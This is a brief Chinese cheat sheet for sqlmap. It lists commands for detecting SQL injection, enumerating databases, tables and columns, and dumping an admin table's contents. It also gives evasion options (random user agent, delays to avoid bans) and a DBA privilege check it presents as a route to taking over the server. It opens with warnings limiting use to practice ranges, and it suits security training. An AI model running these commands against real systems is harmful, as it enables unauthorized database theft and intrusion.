本文章仅限于靶场使用,请勿用于未授权的违法攻击!!
用户滥用造成的一切后果自负!!
使用者请务必遵守当地法律!!
1.判断是否存在sql注入
python sqlmap.py -u 带有参数的url目标
2.跑数据库
python sqlmap.py -u 带有参数的url目标 --dbs
3.跑当前数据库
python sqlmap.py -u 带有参数的url目标 --current-db
4.跑表
python sqlmap.py -u 带有参数的url目标 -D 数据库 --tables
5.跑列
python sqlmap.py -u 带有参数的url目标 -D 数据库 -T 管理员表 --columns
6.跑值
python sqlmap.py -u 带有参数的url目标 -D 数据库 -T 管理员表 --dump
(慎用,很危险,不要未经授权碰别人数据)
额外
--random-agent 随即请求头,默认是sqlmap
--delay=1 每次探测延时1秒(防止访问过快被ban)
--level 1-5 一共有5个等级(1-5) 不加 level 时,默认是1;5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。level=2 http cookie会测试,level=3 http user-agent/referer头会测试
--risk 默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。
一般--level 3 --risk2
--is -dba 查看当前注入点的数据库权限,如果是显示current user is DBA:False那就是低权限,如果是True那就是高权限,如果是高权限就可以直接拿服务器用下面的这条命令
python sqlmap.py -u 带有参数的url目标 --is-dba
--proxy=http://127.0.0.1:8080流量不发给目标站,直接发给本地8080也就是burpsuite
python sqlmap.py -u带有参数的url目标 --flush-session --proxy=http://127.0.0.1:8080